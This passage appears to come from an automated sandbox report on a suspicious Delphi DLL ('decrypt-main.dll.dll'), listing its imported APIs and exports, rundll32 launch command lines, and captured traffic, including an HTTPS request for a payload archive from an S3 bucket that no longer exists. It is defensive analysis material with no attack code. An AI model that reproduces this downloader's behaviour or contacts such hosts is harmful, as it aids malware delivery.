CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetNearestColor, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	lstrcmpW, WriteFile, WinExec, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, TerminateProcess, SystemTimeToFileTime, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OpenProcess, MulDiv, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
netapi32.dll	NetApiBufferFree, NetWkstaGetInfo
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll	memset, memcpy
shell32.dll	ShellExecuteExW, ShellExecuteW, Shell_NotifyIconW
URLMON.DLL	URLDownloadToFileW
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW
winspool.drv	OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW
kernel32.dll	MulDiv

Exports

Name	Ordinal	Address
HackCheck	5	0x816700
ServiceCrtMain	4	0x816700
TMethodImplementationIntercept	3	0x498cf0
__dbk_fcall_wrapper	2	0x419ae0
dbkFCallWrapperAddr	1	0x88e290

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2024 16:50:58.698728085 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:58.698821068 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:58.698909998 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:58.713836908 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:58.713871002 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.332724094 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.332812071 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:59.491381884 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:59.491396904 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.491853952 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.491921902 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:59.502892017 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:59.548227072 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.708188057 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.708311081 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.708415031 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:59.714478016 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:59.714513063 CET	443	49729	16.12.1.62	192.168.2.4
Mar 13, 2024 16:50:59.714540958 CET	49729	443	192.168.2.4	16.12.1.62
Mar 13, 2024 16:50:59.714595079 CET	49729	443	192.168.2.4	16.12.1.62

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2024 16:50:58.373653889 CET	54496	53	192.168.2.4	1.1.1.1
Mar 13, 2024 16:50:58.466723919 CET	53	54496	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2024 16:50:58.373653889 CET	192.168.2.4	1.1.1.1	0x336f	Standard query (0)	bucreate203920233.s3.sa-east-1.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	bucreate203920233.s3.sa-east-1.amazonaws.com	s3-r-w.sa-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.1.62	A (IP address)	IN (0x0001)	false
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.2.34	A (IP address)	IN (0x0001)	false
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	s3-r-w.sa-east-1.amazonaws.com		52.95.163.114	A (IP address)	IN (0x0001)	false
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.1.58	A (IP address)	IN (0x0001)	false
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.232.130	A (IP address)	IN (0x0001)	false
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.121	A (IP address)	IN (0x0001)	false
Mar 13, 2024 16:50:58.466723919 CET	1.1.1.1	192.168.2.4	0x336f	No error (0)	s3-r-w.sa-east-1.amazonaws.com		52.95.163.94	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bucreate203920233.s3.sa-east-1.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49729	16.12.1.62	443	7516	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-13 15:50:59 UTC	336	OUT	GET /bucketPc.zip HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: bucreate203920233.s3.sa-east-1.amazonaws.com Connection: Keep-Alive
2024-03-13 15:50:59 UTC	285	IN	HTTP/1.1 404 Not Found x-amz-request-id: TKB5CKH123017SA6 x-amz-id-2: aTk7n8ul0eLKfek03zQ+rqk8WoPYFkzu5x5+WZ+osLOxsf8k/+vYXVouPUpp2T94AENI8+MgxYY= Content-Type: application/xml Transfer-Encoding: chunked Date: Wed, 13 Mar 2024 15:50:59 GMT Server: AmazonS3 Connection: close
2024-03-13 15:50:59 UTC	319	IN	Data Raw: 31 33 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 62 75 63 6b 65 74 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 4d 65 73 73 61 67 65 3e 3c 42 75 63 6b 65 74 4e 61 6d 65 3e 62 75 63 72 65 61 74 65 32 30 33 39 32 30 32 33 33 3c 2f 42 75 63 6b 65 74 4e 61 6d 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 54 4b 42 35 43 4b 48 31 32 33 30 31 37 53 41 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 61 54 6b 37 6e 38 75 6c 30 65 4c 4b 66 65 6b 30 33 7a 51 2b 72 71 6b 38 57 6f 50 59 46 6b 7a 75 35 78 35 2b Data Ascii: 133<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>bucreate203920233</BucketName><RequestId>TKB5CKH123017SA6</RequestId><HostId>aTk7n8ul0eLKfek03zQ+rqk8WoPYFkzu5x5+

Target ID:	0
Start time:	16:50:55
Start date:	13/03/2024
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll"
Imagebase:	0x7ff78deb0000
File size:	165'888 bytes
MD5 hash:	763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	moderate
Has exited:	true

Target ID:	1
Start time:	16:50:55
Start date:	13/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	16:50:55
Start date:	13/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Imagebase:	0x7ff7d6c60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	16:50:55
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	16:50:55
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	16:50:56
Start date:	13/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7532 -s 476
Imagebase:	0x7ff7ccbc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	16:50:58
Start date:	13/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7516 -s 2004
Imagebase:	0x7ff7ccbc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	16:50:59
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	false

Target ID:	11
Start time:	16:51:02
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	16:51:02
Start date:	13/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7924 -s 448
Imagebase:	0x7ff7ccbc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	16:51:05
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	false

Target ID:	15
Start time:	16:51:05
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	false

Target ID:	16
Start time:	16:51:05
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Has exited:	true

Target ID:	17
Start time:	16:51:05
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Has exited:	true

Target ID:	18
Start time:	16:51:05
Start date:	13/03/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper
Imagebase:	0x7ff7b01d0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Has exited:	true

Target ID:	21
Start time:	16:51:05
Start date:	13/03/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 8068 -s 472
Imagebase:	0x7ff7ccbc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true